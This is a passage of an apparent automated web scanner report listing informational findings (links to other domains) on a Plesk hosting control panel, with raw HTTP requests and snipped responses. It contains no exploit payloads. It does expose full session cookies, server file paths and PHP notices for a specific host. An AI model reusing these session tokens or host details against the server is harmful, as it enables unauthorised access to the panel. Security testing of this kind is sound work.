X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:19:40 GMT
Connection: close
Content-Length: 54107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/sitebuilder" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.11. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/edit/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/edit/?cmd=chdir&file=%2Fhttpdocs%2Fbaseline%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/edit/?cmd=edit&file=baseline-file
Cookie: PLESKSESSID=d9f3512785d3d4954fc9f71052a4fb73; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=true; locale=en-US; PHPSESSID=d9f3512785d3d4954fc9f71052a4fb73; testCookie=test; psaContext=domains; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; user=187d997e8ea6a5d0f56792f7f9ba70a4;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:20:31 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:20:36 GMT
Connection: close
Content-Length: 38071

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/baseline/baseline-file" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.12. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/permissions/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/permissions/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fplesk.cloudscan.me%2Fanon_ftp HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:07:15 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:25 GMT
Connection: close
Content-Length: 35773

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.13. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=chdir&file=%2Fsubdomains%2Fweb_users%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=web_users
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:11:59 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:12:17 GMT
Connection: close
Content-Length: 37970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="https://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.14. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=chdir&file=%2Fanon_ftp%2Fanon_ftp%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=anon_ftp
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:10:45 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:11:44 GMT
Connection: close
Content-Length: 47415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/asp" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/aspnet" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/coldfusion" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/perl" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/php" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test/python" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.15. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/rename/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=chdir&file=%2Fhttpdocs%2F HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/rename/?cmd=rename_dir&file=httpsdocs
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; testCookie=test; psaContext=domains; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:11:39 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=domains; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:11:46 GMT
Connection: close
Content-Length: 52256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/App_Data" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/css" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/img" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/picture_library" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/sitebuilder" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/test" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/favicon.ico" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/header.js" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<td><A href="http://plesk.cloudscan.me/index.html" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/vista/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title="">
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.16. http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/view/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/client@1/domain@1/hosting/file-manager/view/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plesk/client@1/domain@1/hosting/file-manager/view/?cmd=show&file=bad_gateway.html HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/plesk/client@1/domain@1/hosting/file-manager/?cmd=chdir&file=%2Ferror_docs%2F
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; SessionID=42b54cb11fc3aedbd; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:08:09 GMT
Connection: close
Content-Length: 160306

<br />
<b>Notice</b>: Constant PRODUCT_MODE already defined in <b>C:\Program Files (x86)\Parallels\Plesk\admin\auto_prepend\auth.php3</b> on line <b>11</b><br />
<br />
<b>Notice</b>: Constant VZCP_
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.17. http://174.122.23.218:8880/plesk/dashboard/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /plesk/dashboard/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /plesk/dashboard/?context=dashboard HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/domains/sitebuilder_edit.php
Cookie: PLESKSESSID=10321169792bce25daa15603ea9ba645; do-not-show-getting-started-popup=true; sessionID=ratyxspkfhncnbudbnjoxfoj; show-getting-started-popup=false; locale=en-US; PHPSESSID=10321169792bce25daa15603ea9ba645; psaContext=dashboard; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Sun, 10 Oct 2010 02:07:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 02:07:03 GMT
Connection: close
Content-Length: 16371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<m
...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.18. http://174.122.23.218:8880/smb/app/available/id/apscatalog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/available/id/apscatalog/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /smb/app/available/id/apscatalog/?category=Web%2FContent+management HTTP/1.1
Host: 174.122.23.218:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://174.122.23.218:8880/smb/app/top-categories-data/
Cookie: do-not-show-getting-started-popup=true; show-getting-started-popup=false; PHPSESSID=10321169792bce25daa15603ea9ba645; user=54a8ad2443247fe6e4900290dc4e0cf8;

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:07:16 GMT
Connection: close
Content-Length: 15752


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<h1 class="logo">
<a href="http://www.parallels.com" title="Parallels Small Business Panel" onclick="window.open(this.href); return false;">
<img src="/smb/styles/img/product-logo.gif" alt="Parallels Small Business Panel" />
...[SNIP]...
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>
...[SNIP]...
</a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2010, Parallels. All rights reserved</a>
...[SNIP]...

7.19. http://174.122.23.218:8880/smb/app/search-data/catalogId/marketplace  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/app/search-data/catalogId/marketplace

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /smb/app/search-data/catalogId/marketplace?name=&vendor=&packager=&cert=any HTTP/1.1
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-us
x-prototype-version: 1.6.1_rc3
Referer: http://174.122.23.218:8880/smb/app/market/id/marketplace
x-requested-with: XMLHttpRequest
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Host: 174.122.23.218:8880
Proxy-Connection: Keep-Alive
Cookie: show-getting-started-popup=false; user=54a8ad2443247fe6e4900290dc4e0cf8; do-not-show-getting-started-popup=true; PHPSESSID=10321169792bce25daa15603ea9ba645

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.2.6
X-Powered-By: ASP.NET
Date: Sun, 10 Oct 2010 01:06:40 GMT
Connection: close
Content-Length: 28409

<div class="aps-marketplace"><ul class="aps-marketplace-list"><li class="odd">
<div class="package-block">
<div class="package-content clearfix">
<div class="package-icon">

...[SNIP]...
eepit.com\/unlimited","name":"Keepit Online Backup","version":"1","release":"1","vendor":"Keepit","packager":"Keepit","isAps":false,"packageUrl":"https:\/\/www.keepit.com\/downloadstep","rating":0} )'><img src="http://catalog.beta.parallels.com/static/images/nonaps/keepit-box.png"/></a>
...[SNIP]...
com\/","name":"MagicSpam","version":"1","release":"0.4","vendor":"LinuxMagic","packager":"LinuxMagic","isAps":false,"packageUrl":"http:\/\/download.marketplace.parallels.com\/magicspam","rating":0} )'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/magicspam_box.png"/></a>
...[SNIP]...
\/\/www.symantec.com\/norton\/internet-security","name":"Norton Internet Security","version":"2010","release":"1","vendor":"Symantec","packager":"Symantec","isAps":false,"packageUrl":"","rating":0} )'><img src="http://catalog.marketplace.parallels.com/static/images/nonaps/norton-box.png"/></a>
...[SNIP]...
/www.pinnaclecart.com\/","name":"PinnacleCart","version":"3.6.3","release":"905","vendor":"Desert Dog Marketing, LLC","packager":"Desert Dog Marketing, LLC","isAps":true,"packageUrl":"","rating":0} )'><img src="http://catalog.marketplace.parallels.com/storage/Desert%20Dog%20Marketing%2C%20LLC/PinnacleCart/3.6.3-905/Desert%20Dog%20Marketing%2C%20LLC/undefined/undefined/undefined/resources/images/pinnacle-box.png"/></a>
...[SNIP]...
dgemanager\/","name":"Interspire Knowledge Manager","version":"5.1.0","release":"3","vendor":"Interspire","packager":"Interspire Knowledge Manager packager","isAps":true,"packageUrl":"","rating":0} )'><img src="http://catalog.marketplace.parallels.com/storage/Interspire/Interspire%20Knowledge%20Manager/5.1.0-3/Interspire%20Knowledge%20Manager%20packager/undefined/undefined/undefined/resources/images/interspire-km-box.png"/></a>
...[SNIP]...
m\/emailmarketer\/","name":"Interspire Email Marketer","version":"5.7.3","release":"2","vendor":"Interspire","packager":"Interspire Email Marketer packager","isAps":true,"packageUrl":"","rating":0} )'><img src="http://catalog.marketplace.parallels.com/storage/Interspire/Interspire%20Email%20Marketer/5.7.3-2/Interspire%20Email%20Marketer%20packager/undefined/undefined/undefined/resources/images/interspire-em-box.png"/></a>
...[SNIP]...

7.20. http://174.122.23.218:8880/smb/file/index/type/external/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://174.122.23.218:8880
Path:   /smb/file/index/type/external/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /smb/file/index/type/external/?folder= HTTP/1.1
Host: 174.122.23.218:8880
Proxy-Connection: keep-alive
Referer: http://174.122.23.218:8880/smb/file/index/type/external/?folder=
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
